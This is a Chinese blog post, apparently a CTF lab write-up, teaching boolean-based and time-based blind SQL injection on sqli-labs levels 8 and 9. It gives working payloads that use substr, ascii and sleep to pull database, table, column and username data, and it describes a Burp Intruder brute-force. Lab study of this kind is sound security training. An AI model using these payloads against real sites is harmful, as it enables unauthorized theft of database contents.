sql注入-布尔盲注_时间盲注

已于 2022-04-03 11:17:59 修改
阅读量2.9k 收藏
点赞数
分类专栏: ctf web类 文章标签: 其他
于 2022-04-02 12:27:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62008601/article/details/123916370
版权

布尔盲注在注入时无回显的情况下适用,有关盲注涉及到的函数如下:

length()返回字符串长度
substr(a,b,c)从字符串a中b位截取c个字符
ascii() 将字符逐个转为ascii码    ascii码共128个
left(a,b)从左侧截取前b位
regexp '^ro'正则表达式,此句表示前两位为ro;与 like 'ro%' 作用一样
ord()返回字符串第一个字符的ascii码
mid(1,2,3)与substr()用法一样,从字符串a中b位截取c个字符

布尔盲注实例sqli-labs-less-8

本关为布尔盲注,尝试payload

可以看到and 1=1时回显正常,1=2时没有回显任何信息也没有报错,可确定为盲注。接下来进行猜数据库长度

可以看到大于7时正常,大于8时无回显,说明数据库长度为8,然后就可以进行爆数据库了?id=1' and ascii(substr(database(),1,1))>0 --+ 通过转化为ascii码值来确定数据库名,这里我选择抓包进行fuzz

抓包后先点击clear清除变量,再选择所需要进行爆破的数据add添加为变量

第一个变量为数据库的位数,这里数据库长度为8所以选择到8就可以了

第二个变量就是数据库每个字母所对应的ascii码值,所以选到127就够了,然后就可以开始进行爆破了

完成之后按长度进行筛选 就可以发现8个数据的长度不一样,刚刚好就是数据库名称,对照ascii码表,可确定数据库名称为security。接下来的爆表名,字段名以及字段内容都是以相同的操作进行。这里就不一一展示了

基于时间的盲注

基于时间的盲注,跟布尔型的盲注不同,无论输入什么回显的信息让我们无法根据正确或者错误来判断,但它有另外一种方式,那就是页面返回的时间,我们可以根据这个时间来判断真假。比如:正确的话会导致时间很长,错误的话会导致执行时间很短。

基于时间的盲注的两个重要函数:

 时间盲注的实例:sqli-labs-less-9

本关的题目介绍说的就是单引号注入,注入点与注入类型的判断在此跳过

获取数据库长度id=1’ and sleep(3) and length(substr(database(),m,10))>n --+

(判断长度时substr(a,b,c)中的c应大于数据库长度,所以尽可能的取大点的数,不然就会判断出错)

我们先进行对比一下

依次尝试了数据库长度为>6,>7,>8的时候,发现6和7的时候反应时间都是3s,而8的时候反应时间则是一瞬间,说明此时大于8不成立了,此时可以说明数据库长度为8。

接下来的思路同上,就不一一展示了。

爆数据库
 id =1' and sleep(3) and ascii(substr(database(),m,1))>n --+

爆表 id =1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit a,1),m,1))>n and sleep(3) --+

爆字段  id =1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit a,1),m,1))>n and sleep(3) --+

爆字段内容  id =1' and ascii(substr((select username from security.users limit a,1),m,1))>n and sleep(3) --+

7562ajj
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试——布尔时间
zjdda的博客
07-12 2028
简要讲解的两种类型:布尔时间
SQL注入之基于布尔详解
09-10
布尔SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
渗透测试-SQL注入布尔时间
lza20001103的博客
04-20 2805
渗透测试-SQL注入布尔时间
SQL注入-布尔时间
热门推荐
LJH1999ZN的博客
02-10 1万+
一、什么是 就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为。 通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。 二、的分类 基于布尔类型的 基于时间类型的 三、利用
布尔时间
zsdddddss的博客
12-25 158
布尔时间
sqli-labs攻关2(布尔时间)
qwzf
07-22 908
前言 之前已经通过sqli-libs攻关的方式,总结过SQL注入的简单注入和双注入。所以这次继续通过sqli-libs攻关的方式总结SQL注入布尔时间。 正文 ...
布尔.py_sqlpython_
10-03
布尔(Boolean-Based Blind Injection)是SQL注入攻击的一种类型,攻击者通过发送精心构造的查询,观察系统响应是否变化来判断数据库中的信息。在这个场景中,我们关的是一个名为"布尔.py"的Python脚本,...
网络安全-实验七-SQL注入-+sqlmap使用.docx
11-10
【网络安全-实验七-SQL注入-+sqlmap使用】 SQL注入是一种常见的网络攻击方式,它通过在应用程序的输入参数中嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验中,我们将深入理解SQL注入类型,并...
超级SQL注入工具,支持布尔,报错,union注入
03-27
超级SQL注入工具目前支持Bool型、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
sql注入 自学笔记 报错注入 二阶注入 布尔时间 基于sqli-labs
02-19
SQL注入基础知识点 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过构造特定的SQL语句来获取敏感信息或控制数据库。下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造...
渗透测试基础-布尔时间
weixin_45488495的博客
04-09 4192
渗透测试基础-布尔时间实现的关键函数布尔靶场演练时间靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 的特点如它的名字那样,它关闭了因恶意语句而导致的报错,也没有了像显错注入那样醒目的提醒。它的提示会很隐晦,就看我们有没有能力能让它显现出来。 布尔时间 也分布尔时间,这里分别来了解一下各自的区别 布尔:相较于显错注入,反应会更隐晦,比如当执行的恶意语句条件为Fal
(基于布尔型和时间
qq_35345771的博客
04-05 465
这种攻击的出现是因为界面不再显示报错信息,没法基于错误提示的方法。 1.介绍 主要内容: 向数据库发送对应true或者false问题,根据应用程序返回的信息判断结果 几个函数: substr(str,start,len):截取字符串,将str从start(从1开始)位置截取从start开始len长度(包括start) ascii(i):返回i字符的ascii值 2.Get基于时间...
时间布尔实战
weixin_46163639的博客
05-22 457
(Blind SQL Injection) URL是GET,册登录是POST 理论:构造错误的输入参数值,前端没有显示出报错信息,通过来实现注入 有两种类型:1.布尔型 Boolean 基于真假的判断,结果只会返回真假两种,通过之前的and方法来判断是否有注入点。 关键在于通过表达式结果与已知值进行对比,根据比对结果 判断正确与否。 布尔实战: Burpsuite模块—-Intruder模块详解 具体应用请移步然后回来再看看就明白: https://www.cnblogs.com/yufu
【Less-9/10】时间
ssrf
10-30 482
目录一、知识铺垫二、时间复现1、测试注入点2、爆表名3、爆列名4、爆内容 一、知识铺垫 sql中的if表达式: 语法:IF( expr1 , expr2 , expr3 ) expr1 的值为 TRUE,则返回值为 expr2 expr1 的值为FALSE,则返回值为 expr3 SELECT IF(TRUE,1+1,1+2); -> 2 SELECT IF(FALSE,1+1,1+2); -> 3 SELECT IF(STRCMP("111","222"),"不相等","相等
CTFHub布尔(新的payload)
weixin_44732566的博客
02-23 5420
CTFHub 布尔 题目已经表明是布尔,发现没有闭合,也木有过滤,本来也是道基础题,但是发现回显不对头: payload:?id=1 and 's'='p' 回显是query_success 这道题和普通的布尔不一样,一般布尔(我做的也不多)是数据库查询结果为空或者查询语句报错,回显error。这道题是数据库查询为空,返回还是success,只有当查询语句报错时才返回erroe。 ...
SQL注入sqlmap布尔payload解析
无名J0kзr的博客
10-07 3837
难受 占坑明天更
sql注入布尔
weixin_45653478的博客
04-09 1385
id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1)))=117 --+ 爆的i。例如:substr(abcd,1,1) 从第一位开始(也就是从a开始)截取一个字符,就是a。substr(abcd,2,1) 从第二位开始,截取一个字符,就是b。抓包并发送intruder。设置多个payload集合。
sql注入布尔
qq_45927819的博客
06-25 1248
文章目录布尔原理sqli-labs-less8burpsuite爆破数据库名(一)burpsuite爆破数据库名(二) 注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入布尔 原理 注入的时候只会返回True和False,所以布尔就是根据页面显示的是True还是False进行猜测数据库中的信息。 布尔需要几个函数的辅助,就先来了解一下这几个函数 length()函数可返回字符串的长度 substring()函数可以截取字符串,可指定开始的位置和
sql注入布尔流程
最新发布
06-28
SQL注入布尔是一种利用SQL注入技术来检测查询结果是否满足某个条件的攻击方法,它通常在应用程序中用于验证用户输入时使用。以下是SQL注入布尔的基本流程: 1. **识别可注入点**:攻击者首先尝试找出页面上可以接收用户输入的地方,如表单、URL参数等,这些地方可能存在SQL查询。 2. **构造基础查询**:创建一个基本的查询语句,通常是检测一个特定值(例如用户是否存在)的存在,通常是一个简单的`SELECT * FROM table WHERE column = 'value'`。 3. **提交测试数据**:在查询中替换'value'为潜在的恶意输入,例如`'1'`或`'1 OR 1=1'`。'1'会返回所有结果,而`'1 OR 1=1'`在大多数情况下会返回所有数据,因为布尔条件为真。 4. **观察响应**:根据服务器返回的结果,判断原始查询条件是否满足。如果服务器返回预期的结果(如所有数据),则说明条件成立;反之,如果返回空结果或异常,则条件不成立。 5. **迭代调整**:根据响应调整恶意输入,例如尝试否定条件(如`'1 OR 1=0'`),直到找到正确的布尔表达式。 6. **解析结果**:利用布尔表达式的真假来推断数据库中的敏感信息,例如是否存在特定记录、字段值等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值